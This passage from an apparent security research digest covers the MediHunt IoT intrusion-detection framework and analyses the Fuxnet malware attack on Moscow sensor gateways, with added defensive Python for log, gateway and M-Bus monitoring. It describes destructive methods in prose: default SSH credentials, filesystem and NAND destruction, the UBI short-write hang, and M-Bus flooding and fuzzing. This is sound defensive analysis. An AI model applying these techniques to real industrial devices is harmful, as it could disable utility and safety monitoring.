• Implementation on Raspberry Pi: The authors analyzed the performance of machine learning (ML) algorithms on Raspberry Pi 3B models to implement the MediHunt network forensics framework on resource-limited MIoT devices.
• Comparable Inference and Training Times: The evaluation revealed that the inference and training times of the ML algorithms were comparable on the Raspberry Pi devices. Specifically, the inference time on the cloud platform was around 2ms, while on the Raspberry Pi it was 0.17ms.
• Lightweight Intrusion Detection System: MediHunt is described as a lightweight intrusion detection system solution that can be readily deployed on resource-constrained MIoT devices like Raspberry Pis.
• Real-time Attack Detection: The framework's ability to detect attacks in real time is highlighted, enabling immediate response and mitigation of potential threats.
• Efficient Resource Utilization: Despite its comprehensive capabilities for network forensics, the MediHunt framework is designed to be resource-efficient, making it suitable for deployment on resource-constrained MIoT devices like Raspberry Pis.
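As an added illustration (not MediHunt's code) of two building blocks described above, the following Python turns captured packets into per-flow records with a feature vector a classifier can score, and writes only the flagged flows to a bounded, hash-chained evidence log so that storage stays small on a constrained device and later tampering with stored evidence is detectable. The packet sample, the feature set and the threshold rules that stand in for the trained model are assumptions for the demo.

```python
import hashlib
import json
from collections import deque, namedtuple
from dataclasses import dataclass, field
from typing import Deque, Dict, Iterable, List, Optional, Tuple

FlowKey = Tuple[str, str, int, int]  # (src IP, dst IP, src port, dst port)
MQTT_PORT = 1883
# One captured packet; mqtt_type is the MQTT control packet type ("" if none)
Packet = namedtuple("Packet", "ts src dst sport dport length mqtt_type", defaults=("",))

@dataclass
class Flow:
    key: FlowKey
    first_ts: float
    last_ts: float
    packets: int = 0
    nbytes: int = 0
    mqtt: Dict[str, int] = field(default_factory=dict)

    def features(self) -> Dict[str, float]:
        """Per-flow feature vector (the feature set is an assumption for the demo)."""
        duration = max(self.last_ts - self.first_ts, 1e-3)
        return {"packets": self.packets, "pkt_rate": self.packets / duration,
                "avg_len": self.nbytes / self.packets,
                "connects": self.mqtt.get("CONNECT", 0)}

def aggregate_flows(packets: Iterable[Packet]) -> Dict[FlowKey, Flow]:
    """Group packets into unidirectional flows keyed by the 4-tuple."""
    flows: Dict[FlowKey, Flow] = {}
    for p in packets:
        key = (p.src, p.dst, p.sport, p.dport)
        f = flows.get(key)
        if f is None:
            f = flows[key] = Flow(key, p.ts, p.ts)
        f.last_ts = max(f.last_ts, p.ts)
        f.packets += 1
        f.nbytes += p.length
        if p.mqtt_type:
            f.mqtt[p.mqtt_type] = f.mqtt.get(p.mqtt_type, 0) + 1
    return flows

def classify(feat: Dict[str, float]) -> Optional[str]:
    """Threshold rules standing in for the trained model (assumed, not the paper's)."""
    if feat["connects"] >= 20 and feat["pkt_rate"] > 50:
        return "mqtt-connect-flood"  # application layer: repeated CONNECTs
    if feat["packets"] >= 200 and feat["avg_len"] < 60:
        return "tcp-packet-flood"    # TCP/IP layer: many tiny packets
    return None

def _digest(body: dict) -> str:
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()

class EvidenceLog:
    """Bounded store of attack-relevant flows; SHA-256 chaining makes tampering detectable."""

    def __init__(self, max_records: int) -> None:
        # deque(maxlen=...) silently evicts the oldest record once the budget is full
        self.records: Deque[dict] = deque(maxlen=max_records)

    def append(self, flow: Flow, label: str) -> str:
        prev = self.records[-1]["hash"] if self.records else "0" * 64
        body = {"flow": list(flow.key), "label": label, "first_ts": flow.first_ts,
                "last_ts": flow.last_ts, "features": flow.features(), "prev": prev}
        self.records.append({**body, "hash": _digest(body)})
        return self.records[-1]["hash"]

    def verify(self) -> bool:
        """Recompute every hash and link; False if a record was altered or reordered."""
        for i, rec in enumerate(self.records):
            body = {k: v for k, v in rec.items() if k != "hash"}
            if _digest(body) != rec["hash"]:
                return False
            if i and body["prev"] != self.records[i - 1]["hash"]:
                return False
        return True

def analyse(packets: Iterable[Packet], log: EvidenceLog) -> Dict[FlowKey, Optional[str]]:
    """Score every flow; only flagged flows are written to the evidence log."""
    verdicts: Dict[FlowKey, Optional[str]] = {}
    for key, flow in aggregate_flows(packets).items():
        label = classify(flow.features())
        if label is not None:
            log.append(flow, label)
        verdicts[key] = label
    return verdicts

def constructed_capture() -> List[Packet]:
    """Constructed sample: a well-behaved sensor, a CONNECT flood and a
    small-packet flood, all towards a broker at 10.0.0.1."""
    b = "10.0.0.1"
    pkts = [Packet(0.0, "10.0.0.5", b, 40001, MQTT_PORT, 70, "CONNECT")]
    pkts += [Packet(1.0 + i, "10.0.0.5", b, 40001, MQTT_PORT, 60, "PUBLISH") for i in range(10)]
    pkts += [Packet(20.0 + i * 0.01, "10.0.0.9", b, 50000, MQTT_PORT, 80, "CONNECT") for i in range(100)]
    pkts += [Packet(30.0 + i * 0.01, "10.0.0.7", b, 51000, MQTT_PORT, 40) for i in range(300)]
    return pkts

if __name__ == "__main__":
    log = EvidenceLog(max_records=16)
    print(analyse(constructed_capture(), log), "chain intact:", log.verify())
```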

SECTION: RESEARCH

FUXNET

Abstract – This document presents a comprehensive analysis of the Fuxnet malware, att attributed to the Blackjack hacking group, which has reportedly targeted infrastructure. The analysis delves into various aspects of the malware, including its technical specifications, impact on systems, defense mechanisms, propagation methods, targets, and the motivations behind its deployment. By examining these facets, the document aims to provide a detailed overview of Fuxnet's capabilities and its implications for cybersecurity.

The document offers a qualitative summary of the Fuxnet malware, based on the information publicly shared by the attackers and analyzed by cybersecurity experts. This analysis is invaluable for security professionals, IT specialists, and stakeholders in various industries, as it not only sheds light on the technical intricacies of a sophisticated cyber threat but also emphasizes the importance of robust cybersecurity measures in safeguarding critical infrastructure against emerging threats. Through this detailed examination, the document contributes to the broader understanding of cyber warfare tactics and enhances the preparedness of organizations to defend against similar attacks in the future.

A. Introduction
The Blackjack hacking group, purportedly linked to Ukrainian intelligence services, has claimed responsibility for a cyberattack that allegedly compromised emergency detection and response capabilities in Moscow and its surrounding areas. This group has been associated with previous cyberattacks targeting internet providers and military infrastructure. Their most recent claim involves an attack on Moscollector, a company responsible for constructing and monitoring underground water, sewage, and communications infrastructure.

The group has disseminated detailed information about this attack on the website ruexfil.com, including the use of Fuxnet malware to disrupt the Moscollector network operations center. They have published screenshots of monitoring systems, servers, and databases they assert have been erased and made inoperative, along with password dumps.

Regarding the infection methods, the Fuxnet malware appears to have been designed to target sensor-gateways and potentially disable them, as well as to fuzz sensors, which could lead to their malfunction or destruction.

The destruction of these gateways and the fuzzing of sensors could have serious implications for the monitoring and control of various systems, potentially leading to a loss of operational visibility and control for the affected infrastructure.

The key takeaways from the analysis of the Fuxnet malware, including the findings of Team82 and Claroty, are as follows:
• Unverified Claims: Team82 and Claroty have not been able to confirm the claims made by the Blackjack group regarding the impact of their cyberattack on the government's emergency response capabilities or the extent of the damage caused by the Fuxnet malware.
• Discrepancy in Reported Impact: The Blackjack group initially claimed to have targeted 2,659 sensor-gateways, with about 1,700 being successfully attacked. However, Team82's analysis of the data leaked by Blackjack suggests that only a little more than 500 sensor-gateways were actually impacted by the malware. The claim of having destroyed 87,000 sensors was also clarified by Blackjack, stating that they disabled the sensors by destroying the gateways and using M-Bus fuzzing, rather than physically destroying the sensors.
• M-Bus Fuzzing: The Blackjack group utilized a dedicated M-Bus fuzzer within the Fuxnet malware's code to fuzz the sensors. This technique was aimed at disabling the sensors, but the exact number of sensors that were "fried" or permanently damaged as a result of this fuzzing is unknown due to the network being taken down and access to the sensor-gateways being disabled.
• Lack of Direct Evidence: Direct evidence to confirm the extent of the damage or the impact on emergency detection and response capabilities is lacking (including for the targeted Moscollector).
• Clarification from Blackjack: Following the publication of Team82's initial analysis, the Blackjack group reached out to provide updates and clarifications, particularly challenging the contention that only around 500 sensor-gateways had been impacted. They emphasized that the JSON files made public were only a sample of the full extent of their activity.

B. Affected Industries and Potential Consequences
1) Affected Industries:
• Utility Services: The primary target of the Fuxnet malware was the utility sector, specifically the sensor gateways that manage water and sewage systems. This could have implications for the delivery and monitoring of these essential services.
• Emergency Services: The group claimed to have gained access to the 112 emergency service number, which could impact the ability to respond to emergencies effectively.

Read more: Boosty | Sponsr | TG

• Transportation: The group also claimed to have bricked sensors and controllers in critical infrastructure, including airports and subways, which could disrupt transportation services and safety.

• Energy: Gas pipelines were mentioned as another target, indicating a potential risk to energy distribution and monitoring systems.

2) Potential Consequences:
• Disruption of Services: The destruction or malfunction of sensor gateways could lead to a disruption of the monitoring and control systems for utilities, potentially causing service outages or failures.

• Compromised Safety: In the transportation and energy sectors, the loss of sensor functionality could pose safety risks, as these sensors are often critical for detecting hazardous conditions.

• Economic Impact: The potential downtime and repair costs associated with replacing or reflashing damaged sensor gateways could have significant economic repercussions for the affected industries.

• Emergency Response Delays: If the claims about accessing the 112 emergency service number are accurate, this could lead to delays in emergency response, affecting public safety.

• Data Exfiltration: Although not explicitly mentioned in the context of Fuxnet, the malware's ability to compromise network systems could potentially lead to data breaches and the exfiltration of sensitive information.

• Loss of Public Confidence: Cyberattacks on critical infrastructure can lead to a loss of public confidence in the affected services and the entities responsible for their security.

C. Moscollector Attack
The attack, whose initial compromise began in June 2023, was methodically orchestrated to undermine the industrial sensors and monitoring infrastructure. Recently, the group made its activities and the stolen information public on the ruexfil website, detailing the extent and impact of its cyber offensive. The compromise of this system could potentially disrupt emergency response capabilities, affecting the safety and security of the populace.

1) Bricking of Critical Infrastructure Sensors and Controllers
The group alleges to have hacked and bricked sensors and controllers within critical infrastructure sectors, including airports, subways, and gas pipelines. This action, if true, could have disabled essential monitoring and control systems, leading to significant disruptions in public services and safety.

2) Network Appliance Disruption
The group asserts that it has disabled network appliances such as routers and firewalls. This would have a cascading effect on the network's integrity, potentially isolating various segments and hindering communication across the infrastructure.

3) Deletion of Servers and Databases
The attackers claim to have deleted servers, workstations, and databases, wiping out approximately 30 TB of data, including backup drives. This kind of data destruction could lead to a loss of historical data, disrupt ongoing operations, and complicate recovery efforts.

4) Invalidation of Moscollector Office Building Access
All keycards to the office building have reportedly been invalidated. This action could prevent employees from accessing their workplace, further hindering any attempts to assess the damage or initiate recovery protocols.

5) Password Dumping
The dumping of passwords from multiple internal services has also been claimed. This could allow unauthorized access to various systems and data, exacerbating the breach's impact and potentially leading to further exploitation.

D. Attack's Equipment
The attack's focus was on the communication gateways that serve as critical nodes in the data transmission from the sensors to the global monitoring systems. These sensors are integral to various environmental monitoring systems, including those used in fire alarms, gas monitoring, and lighting controls.

The sensors are designed to collect physical data such as temperature and transmit this information through a serial or bus connection, specifically an RS485/Meter-Bus, to a gateway. These gateways act as transmission units, enabling the telemetry data to be sent over the internet to a centralized monitoring system, which provides operators with visibility and control over the systems.

The RS485 communication standard, as mentioned in the attack details, is a widely adopted protocol for industrial control systems due to its reliability and capability for long-distance communication. It allows multiple devices to communicate over a single bus, which is essential for the centralized monitoring of various sensors and controllers.

The Meter-Bus (M-Bus) is another communication protocol used for the collection and transmission of consumption data, typically for utilities like electricity, gas, water, or heat. When combined with RS485, it forms a robust network for industrial sensors to communicate and relay information to central systems.

By compromising the gateways, the attackers could potentially disrupt the telemetry and control of the sensors, leading to a loss of operational visibility and potentially causing chaos in the systems that rely on this data.

1) Leaked Information
The information from the JSON files was corroborated by two YouTube videos released by the attackers, showing the deployment of the Fuxnet malware. The devices listed in the videos matched the gateways from the JSON file, confirming that the TMSB/MPSB gateways were the primary targets of the Fuxnet malware.

The JSON data included device types and names, IP addresses, communication ports, and location data. The types of devices listed in the JSON file were:

• MPSB (sensor gateway): 424 devices
• TMSB (sensor gateway + modem): 93 devices
• IBZ (3G router): 93 devices
• Windows 10 (workstation): 9 devices
• Windows 7 (workstation): 1 device
• Windows XP (workstation): 1 device

This list indicates that the attack was focused on the sensor gateways rather than the end sensors themselves. The gateways serve as the communication hubs for potentially numerous sensors connected via a serial bus such as RS485/Meter-Bus.

The leaked data from the attackers, including screenshots and JSON exports, revealed two specific types of gateways compromised during the attack:

• MPSB Gateway: This gateway is engineered for information exchange with external devices through multiple interfaces. It supports Ethernet and serial communication protocols, including CAN, RS-232, and RS-485. The MPSB gateway is a crucial component for integrating various sensor inputs into a cohesive monitoring system.

• TMSB Gateway: Similar in function to the MPSB, the TMSB gateway includes a built-in 3/4G modem, which allows it to transmit data directly over the internet to a remote system without the need for additional routing equipment.

The cyberattack targeted a critical part of the sensor ecosystem: the orchestrator/gateway devices, specifically the MPSB and TMSB gateways. These devices are essential for reading and controlling basic input/output sensors and transmitting the data to a global monitoring system for centralized oversight.

The attack exploited the communication pathways between the sensors and the global monitoring system. The typical data transmission scenarios targeted were:

• For the MPSB Gateway: Sensor → MBus/RS485 → MPSB + IoT router → Internet → Monitoring system. In this scenario, the sensor data is transmitted via MBus/RS485 to the MPSB gateway, which then passes the data through an IoT router to the internet, and finally to the monitoring system.

• For the TMSB Gateway: Sensor → MBus/RS485 → TMSB (3G/4G modem) → Internet → Monitoring system. Here, the sensor data is sent via MBus/RS485 directly to the TMSB gateway, which uses its built-in modem to transmit the data over the internet to the monitoring system.

2) Security Lapses and Attack Methodology
The attackers exploited a significant security lapse: the use of default credentials (Username: sbk, Password: temppwd) to access the gateways via SSH. This vulnerability provided an easy entry point for the attackers to compromise the devices.

The attackers also leaked diagrams and screenshots from the sensor management UI, showcasing the network topology.

In addition to the TMSB module with built-in 3/4G capabilities, the attackers mentioned the use of iRZ RL22w routers. These routers, which run OpenWRT, were likely employed as internet-gateway devices to connect the sensors to the internet via 3G.

The attackers reportedly used the SSH service to connect to these IoT devices and tunnel to internal devices, likely after obtaining root passwords. Shodan and Censys searches revealed that thousands of iRZ routers are exposed on the internet, with around 4,100 devices directly exposing their services and about 500 enabling Telnet.

3) Sensor Management and Commissioning Software:
The software suite is a critical tool used by engineers to manage and configure sensors within an industrial or infrastructure setting. This software connects to devices using a proprietary protocol that runs over TCP port 4321. The interface allows engineers to access and modify the settings of sensors, including their input/output configurations, nodes, and readings. This capability is essential for the proper setup and maintenance of sensor networks, ensuring they operate efficiently and accurately within their designated environments.

Features of the software:
• Device Connection: Utilizes a proprietary protocol over TCP/4321 to establish a secure connection with sensors.
• Configuration Capabilities: Enables the configuration of sensor settings, including adjustments to their operational parameters and the management of the data they collect.
• User Interface: The interface provides a straightforward and intuitive means for engineers to interact with connected sensors, facilitating ease of use and efficiency in sensor management tasks.

4) Technical Impact
The sensor monitoring system is another significant component of the infrastructure targeted in the attack. This system is designed to aggregate and display telemetry and status reports from a network of sensors. It plays a vital role in operational oversight by allowing system operators to receive real-time alerts, log data, and manage sensors remotely.

According to the claims made by the group, they successfully compromised this monitoring system. By doing so, they gained access to a comprehensive list of managed sensors and were able to correlate these sensors geographically on a map. This breach not only exposed sensitive operational data but also potentially allowed the attackers to manipulate sensor outputs and disrupt normal operations. In terms of visualization and control:
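The default-credential lapse described in this section is the kind of event that is visible in a gateway's own sshd authentication log, provided the log is shipped off the device before the malware disables remote access. The following Python is an added example, not code from this digest, from Team82, or from the Fuxnet sample: it parses OpenSSH-style auth lines and raises alerts for a password login to the vendor-default account (the page reports the account name sbk), for any successful login from outside an assumed management network (10.20.0.0/24 is an assumption), and for failed logins from untrusted sources. The log lines are constructed.

```python
"""Detection over sshd auth log lines for the default-credential lapse.

Added example, not Fuxnet code and not Team82 tooling. The account name
comes from the page; the management network and the log lines below are
constructed assumptions.
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass

# Vendor-default account reported on the page; extend for the real image.
DEFAULT_ACCOUNTS = {"sbk"}
# Assumption: operators only reach gateways from this network.
MANAGEMENT_NETWORKS = [ipaddress.ip_network("10.20.0.0/24")]

# OpenSSH "Accepted/Failed <method> for [invalid user] <user> from <ip> port <n>"
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\S+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port (?P<port>\d+)"
)


@dataclass(frozen=True)
class Alert:
    rule: str
    severity: str
    user: str
    src: str


def analyze_line(line: str) -> list[Alert]:
    """Return the alerts a single sshd log line triggers (possibly none)."""
    m = LINE_RE.search(line)
    if not m:
        return []
    user, src, method, result = m["user"], m["src"], m["method"], m["result"]
    try:
        src_ip = ipaddress.ip_address(src)
    except ValueError:
        return []
    trusted = any(src_ip in net for net in MANAGEMENT_NETWORKS)
    alerts: list[Alert] = []
    if result == "Accepted":
        if user in DEFAULT_ACCOUNTS and method == "password":
            # The exact condition the page describes: default account, password auth.
            alerts.append(Alert("default_account_password_login", "high", user, src))
        elif method == "password":
            # Keys-only policy assumed: any password login is worth a look.
            alerts.append(Alert("password_auth_used", "medium", user, src))
        if not trusted:
            alerts.append(Alert("login_from_untrusted_network", "high", user, src))
    elif result == "Failed" and not trusted:
        alerts.append(Alert("failed_login_from_untrusted_network", "low", user, src))
    return alerts


def analyze_log(lines: list[str]) -> list[Alert]:
    """Run analyze_line over a whole log and flatten the alerts."""
    return [alert for line in lines for alert in analyze_line(line)]


# Constructed sample log (hostnames, addresses and fingerprint are made up).
SAMPLE_AUTH_LOG = [
    "Jun  3 10:14:22 gw-mpsb-017 sshd[812]: Accepted password for sbk from 10.20.0.5 port 50122 ssh2",
    "Jun  3 10:14:40 gw-mpsb-017 sshd[815]: Accepted password for sbk from 198.51.100.23 port 41000 ssh2",
    "Jun  3 10:15:01 gw-mpsb-017 sshd[820]: Accepted publickey for ops from 10.20.0.5 port 50130 ssh2: ED25519 SHA256:constructedfingerprint",
    "Jun  3 10:15:30 gw-mpsb-017 sshd[822]: Failed password for root from 198.51.100.23 port 41002 ssh2",
]

if __name__ == "__main__":
    for alert in analyze_log(SAMPLE_AUTH_LOG):
        print(f"[{alert.severity}] {alert.rule}: user={alert.user} src={alert.src}")
```

Because the malware, as the page describes later, stops SSH and deletes files on the gateway, the local log is gone once the lock-out starts; the rule only pays off when auth lines are forwarded to a collector in near real time, and the first alert here fires on an otherwise "trusted" source, which is the point: a password login to the default account is suspicious regardless of where it comes from.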

• Geolocation Features: The monitoring system includes geolocation markings, which help in visualizing the physical locations of sensors across the network. This feature is particularly useful for large-scale operations where sensors are dispersed over extensive areas.

• Facility-Specific Monitoring: Screenshots from the system show that it is capable of focusing on specific facilities, such as hospitals, indicating its use in critical infrastructure settings where precise monitoring is necessary for safety and operational integrity.

E. Analyzing the Fuxnet Malware
The malware was designed to target sensor gateways, which are crucial components in the infrastructure of monitoring and control systems. The logical processes identified in the behavior of the Fuxnet malware include several steps aimed at causing irreversible damage to the targeted devices.

• The Fuxnet malware was specifically designed to target and destroy sensor gateways, not the end sensors.
• The malware's actions included locking devices, destroying filesystems, NAND chips, and UBI volumes, and flooding communication channels.
• The attack was likely facilitated by exploiting default credentials and vulnerabilities in remote-access protocols.
• Despite claims of compromising 87,000 devices, the actual impact appears to be limited to the sensor gateways, with the end sensors likely remaining intact.

1) Deployment Script
The attack began with the creation of a deployment script. The attackers compiled a comprehensive list of the IP addresses of the sensor gateways they intended to target, along with detailed descriptions of each sensor's physical location. The malware was then distributed to each target, likely using remote-access protocols such as SSH or the proprietary SBK sensor protocol over TCP port 4321.

2) Locking Up Devices and Destroying the Filesystem
Upon execution on the target device, the Fuxnet malware initiated a process to lock out the device. It remounted the filesystem with write access and proceeded to delete critical files and directories. It also shut down remote access services, including SSH, HTTP, telnet, and SNMP, effectively preventing any remote restoration efforts. Additionally, the malware deleted the device's routing table, crippling its communication capabilities.

3) Destroying NAND Chips
The malware's next step was to physically destroy the NAND memory chips within the devices. It performed a bit-flip operation on sections of the SSD NAND chip, repeatedly writing and rewriting memory until the chip was corrupted. NAND memory has a limited number of write cycles, and the malware exploited this limitation to cause the chips to malfunction and become inoperable.

4) Destroying the UBI Volume
To prevent the device from rebooting, the malware rewrote the UBI volume. It used the IOCTL interface UBI_IOCVOLUP to mislead the kernel into expecting a certain number of bytes to be written, but then wrote fewer bytes, causing the device to hang indefinitely. The malware then overwrote the UBI volume with junk data, destabilizing the filesystem.

5) Denial-of-Service on Monitoring
The final step in the malware's process was to disrupt the communication between the sensor gateways and the sensors themselves. The malware flooded the RS485/Meter-Bus serial channels with random data, overwhelming the bus and the sensors. This action prevented the sensors and gateways from transmitting and receiving data, rendering the data acquisition process useless.

6) The M-Bus Fuzzing Strategy
This strategy involved the constant sending of M-Bus frames over the serial channel, likely RS485, aiming to overwhelm and potentially damage the sensors connected to this network. The attack involved two main tactics: flooding the M-Bus channel with an excessive number of frames and employing fuzzing techniques to potentially exploit vulnerabilities within the sensors.

7) M-Bus Flooding
The attackers aimed to disable sensor communication by overwhelming the M-Bus channel with a high volume of frames. This tactic was likely intended either to directly damage the sensors through overload or to create conditions conducive to exploiting vulnerabilities. The fuzzing approach was more nuanced and targeted. The group implemented two fuzzing strategies within their malware:

• Random Fuzzing: This method involved generating random bytes and sending them over the M-Bus, appending a simple M-Bus checksum so that the frames were not dropped by the sensors. The goal was to cover the entire range of possible M-Bus payloads, valid or not, in the hope of triggering sensor malfunctions or vulnerabilities.

• Structured Fuzzing: This approach attempted to generate valid M-Bus frames, randomizing only specific fields within the protocol. By adhering more closely to the M-Bus structure, the malware increased the likelihood of the sensor treating the packet as valid and parsing it fully, thereby increasing the chances of triggering a vulnerability.
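The lock-out sequence in step 2 (root filesystem remounted writable, remote services stopped, routing table deleted) leaves traces that a gateway-side agent can sample from /proc and report to the monitoring system before the device goes dark. The block below is an added example, not Fuxnet code and not part of Team82's analysis; it assumes a Linux gateway whose root filesystem is normally mounted read-only and which exposes SSH on port 22 and HTTP on port 80, and the /proc snapshots are constructed.

```python
"""Gateway self-check for the lock-out sequence (root remounted rw,
default route gone, management listeners missing).

Added example, not Fuxnet code and not Team82 tooling. It parses the
Linux /proc files an agent would read; the expected listener set and the
snapshots below are constructed assumptions.
"""
from __future__ import annotations

# Assumption: the gateway image serves SSH (22) and HTTP (80).
EXPECTED_LISTENERS = {22, 80}


def root_is_writable(proc_mounts: str) -> bool:
    """True if the filesystem mounted at "/" carries the rw option."""
    for line in proc_mounts.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[1] == "/":
            return "rw" in fields[3].split(",")
    return False


def has_default_route(proc_net_route: str) -> bool:
    """True if /proc/net/route lists an UP route to destination 0.0.0.0."""
    for line in proc_net_route.splitlines()[1:]:  # first line is the header
        fields = line.split()
        if len(fields) >= 4 and fields[1] == "00000000" and int(fields[3], 16) & 0x1:
            return True
    return False


def listening_ports(proc_net_tcp: str) -> set[int]:
    """TCP ports in LISTEN state (st == 0A) from /proc/net/tcp."""
    ports: set[int] = set()
    for line in proc_net_tcp.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 4 and fields[3] == "0A":
            ports.add(int(fields[1].rsplit(":", 1)[1], 16))
    return ports


def gateway_findings(proc_mounts: str, proc_net_route: str, proc_net_tcp: str) -> list[str]:
    """Combine the three checks into a list of findings (empty when healthy)."""
    findings: list[str] = []
    if root_is_writable(proc_mounts):
        findings.append("root_fs_writable")
    if not has_default_route(proc_net_route):
        findings.append("no_default_route")
    for port in sorted(EXPECTED_LISTENERS - listening_ports(proc_net_tcp)):
        findings.append(f"service_down:{port}")
    return findings


# Constructed snapshots: a healthy gateway and one mid lock-out.
HEALTHY_MOUNTS = "ubi0:rootfs / ubifs ro,relatime,ubi=0,vol=0 0 0\nproc /proc proc rw,nosuid 0 0\n"
ATTACKED_MOUNTS = "ubi0:rootfs / ubifs rw,relatime,ubi=0,vol=0 0 0\nproc /proc proc rw,nosuid 0 0\n"

ROUTE_HEADER = "Iface\tDestination\tGateway \tFlags\tRefCnt\tUse\tMetric\tMask\t\tMTU\tWindow\tIRTT\n"
HEALTHY_ROUTE = ROUTE_HEADER + (
    "eth0\t00000000\t0100140A\t0003\t0\t0\t0\t00000000\t0\t0\t0\n"
    "eth0\t0000140A\t00000000\t0001\t0\t0\t0\t00FFFFFF\t0\t0\t0\n"
)
ATTACKED_ROUTE = ROUTE_HEADER  # routing table deleted

TCP_HEADER = "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
HEALTHY_TCP = TCP_HEADER + (
    "   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0 100 0 0 10 0\n"
    "   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1235 1 0 100 0 0 10 0\n"
)
ATTACKED_TCP = TCP_HEADER + (
    "   0: 0500140A:10E1 0200140A:C1C2 01 00000000:00000000 00:00000000 00000000     0        0 1300 1 0 100 0 0 10 0\n"
)

if __name__ == "__main__":
    print("healthy :", gateway_findings(HEALTHY_MOUNTS, HEALTHY_ROUTE, HEALTHY_TCP))
    print("attacked:", gateway_findings(ATTACKED_MOUNTS, ATTACKED_ROUTE, ATTACKED_TCP))
```

The useful property is the ordering of the findings against the malware's own sequence: the rw remount comes first, before files are deleted and services are stopped, so an agent that pushes a heartbeat containing these findings every few seconds gives the monitoring side one narrow window to notice a gateway going bad; after step 4 the device no longer boots and there is nothing left to sample.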
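Section D describes the M-Bus/RS485 link between sensors and gateways, and steps 5 to 7 describe how it was abused: flooding, random bytes carrying a correct checksum, and structurally valid frames with randomized fields. A passive bus monitor can separate normal polling from those tactics by validating every frame and tracking the rate. The following Python is an added example, not code from this digest, from Team82 or from the Fuxnet sample; the frame layouts and checksum follow EN 13757-2 (the standard's check byte is an 8-bit arithmetic sum of the C, A, CI and data bytes, which the page calls a CRC), while the allowlist of control fields, the thresholds and the captured frames are constructed assumptions.

```python
"""Passive M-Bus (EN 13757-2) frame validator with bus-monitor heuristics.

Added example, not Fuxnet code and not Team82 tooling. Frame layouts and
the checksum follow the standard; KNOWN_C_FIELDS, the thresholds and the
two captures below are constructed assumptions.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Optional

START_SHORT, START_LONG, STOP, ACK = 0x10, 0x68, 0x16, 0xE5

# Control fields a monitor expects on a polling bus: master SND_NKE, SND_UD,
# REQ_UD1, REQ_UD2 (with and without FCB) and the slave reply RSP_UD.
KNOWN_C_FIELDS = {0x40, 0x53, 0x73, 0x5A, 0x7A, 0x5B, 0x7B, 0x08}


@dataclass
class Frame:
    kind: str  # ack | short | control | long | invalid
    c: Optional[int] = None
    a: Optional[int] = None
    ci: Optional[int] = None
    data: bytes = b""
    reason: str = ""


def checksum(payload: bytes) -> int:
    """M-Bus check byte: 8-bit arithmetic sum of C, A, CI and data (not a CRC)."""
    return sum(payload) & 0xFF


def build_short_frame(c: int, a: int) -> bytes:
    return bytes([START_SHORT, c, a, checksum(bytes([c, a])), STOP])


def build_long_frame(c: int, a: int, ci: int, data: bytes = b"") -> bytes:
    body = bytes([c, a, ci]) + data
    return bytes([START_LONG, len(body), len(body), START_LONG]) + body + bytes([checksum(body), STOP])


def parse_frame(raw: bytes) -> Frame:
    """Validate one frame; 'invalid' carries the first reason it failed."""
    if raw == bytes([ACK]):
        return Frame("ack")
    if len(raw) == 5 and raw[0] == START_SHORT:
        if raw[4] != STOP:
            return Frame("invalid", reason="bad stop byte")
        if raw[3] != checksum(raw[1:3]):
            return Frame("invalid", reason="bad checksum")
        return Frame("short", c=raw[1], a=raw[2])
    if len(raw) >= 9 and raw[0] == START_LONG:
        length = raw[1]
        if raw[2] != length or raw[3] != START_LONG:
            return Frame("invalid", reason="length/start mismatch")
        if len(raw) != length + 6:
            return Frame("invalid", reason="length field disagrees with frame size")
        if raw[-1] != STOP:
            return Frame("invalid", reason="bad stop byte")
        body = raw[4:4 + length]
        if raw[4 + length] != checksum(body):
            return Frame("invalid", reason="bad checksum")
        kind = "control" if length == 3 else "long"
        return Frame(kind, c=body[0], a=body[1], ci=body[2], data=bytes(body[3:]))
    return Frame("invalid", reason="unrecognized start byte or truncated frame")


def analyze_capture(capture: list, max_frames_per_second: float = 5.0, max_invalid_ratio: float = 0.1) -> dict:
    """Classify a (timestamp, raw_frame) capture: flood, malformed frames, odd C fields."""
    if not capture:
        return {"frames": 0, "rate": 0.0, "invalid": 0, "unknown_c": 0, "findings": []}
    times = [t for t, _ in capture]
    duration = max(max(times) - min(times), 1.0)  # floor at 1 s so one frame is never a "flood"
    frames = [parse_frame(raw) for _, raw in capture]
    invalid = sum(f.kind == "invalid" for f in frames)
    unknown_c = sum(f.kind in ("short", "control", "long") and f.c not in KNOWN_C_FIELDS for f in frames)
    rate = len(frames) / duration
    findings: list[str] = []
    if rate > max_frames_per_second:
        findings.append("flood")
    if invalid / len(frames) > max_invalid_ratio:
        findings.append("malformed_frames")
    if unknown_c:
        findings.append("unexpected_control_field")
    return {"frames": len(frames), "rate": rate, "invalid": invalid, "unknown_c": unknown_c, "findings": findings}


REQ_UD2 = build_short_frame(0x5B, 0x05)               # master polls slave address 5
RSP_UD = build_long_frame(0x08, 0x05, 0x72, b"\x2a")  # slave reply (payload shortened)

# Constructed capture A: one request/reply pair every 2 s.
NORMAL_POLLING = [(t, f) for i in range(4) for t, f in ((2.0 * i, REQ_UD2), (2.0 * i + 0.1, RSP_UD))]

# Constructed capture B: a burst alternating a random-looking frame that
# carries a correct check byte with a copy whose check byte is wrong.
_FUZZ_LIKE = build_long_frame(0x9C, 0x7F, 0x33, b"\xde\xad")
_BROKEN = _FUZZ_LIKE[:-2] + bytes([_FUZZ_LIKE[-2] ^ 0xFF, STOP])
FUZZ_BURST = [(0.05 * i, _FUZZ_LIKE if i % 2 == 0 else _BROKEN) for i in range(12)]

if __name__ == "__main__":
    print("normal:", analyze_capture(NORMAL_POLLING)["findings"])
    print("burst :", analyze_capture(FUZZ_BURST)["findings"])
```

Random fuzz frames with a correct check byte pass validation, exactly as the page says they were meant to, so the discriminators for that mode are the rate and the control field; structured fuzzing would pass both checks and show up only as rate, which is why the threshold should be derived from the known poll cadence per slave address rather than a global constant.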
